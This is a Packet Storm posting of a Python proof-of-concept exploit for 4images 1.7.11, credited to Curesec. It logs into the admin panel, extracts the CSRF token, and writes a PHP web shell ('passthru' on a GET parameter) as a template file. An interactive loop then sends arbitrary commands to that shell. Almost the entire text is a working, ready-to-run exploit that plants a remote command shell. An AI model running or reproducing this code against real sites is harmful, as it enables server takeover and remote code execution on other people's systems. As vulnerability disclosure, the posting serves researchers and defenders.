4images version 1.7.11 code execution proof of concept exploit.
7eccaedc5b4e1b203a89329c72edcc441608199f3d846dc9b66770c51e572ba2
#!/usr/local/bin/python
# Exploit for 4images 1.7.11 Code Execution vulnerability
# An admin account is required to use this exploit
# Curesec GmbH
import sys
import re
import argparse
import requests # requires requests lib
parser = argparse.ArgumentParser()
parser.add_argument("url", help="base url to vulnerable site")
parser.add_argument("username", help="admin username")
parser.add_argument("password", help="admin password")
args = parser.parse_args()
url = args.url
username = args.username
password = args.password
loginPath = "/admin/index.php"
fileManagerPath = "/admin/templates.php"
shellFileName = "404.php"
shellContent = "<?php passthru($_GET['x']); ?>"
def login(requestSession, url, username, password):
csrfRequest = requestSession.get(url)
csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
csrfToken = csrfTokenRegEx.group(1)
postData = {"action": "login", "redirect": ".%2F..%2Fadmin%2Findex.php", "__csrf": csrfToken, "loginusername": username, "loginpassword": password}
loginResult = requestSession.post(url, data = postData).text
return "loginpassword" not in loginResult
def upload(requestSession, url, fileName, fileContent):
csrfRequest = requestSession.get(url)
csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', csrfRequest.text)
csrfToken = csrfTokenRegEx.group(1)
postData = {"action": "savetemplate", "content": fileContent, "template_file_name": fileName, "__csrf": csrfToken, "template_folder": "default"}
loginResult = requestSession.post(url, data = postData).text
def runShell(url):
print("enter command, or enter exit to quit.")
command = raw_input("$ ")
while "exit" not in command:
print(requests.get(url + command).text)
command = raw_input("$ ")
requestSession = requests.session()
if login(requestSession, url + loginPath, username, password):
print("successful: login")
else:
exit("ERROR: Incorrect username or password")
upload(requestSession, url + fileManagerPath, shellFileName, shellContent)
runShell(url + "/templates/default/" + shellFileName + "?x=")
Blog Reference:
https://blog.curesec.com/article/blog/4images-1711-Code-Execution-Exploit-117.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed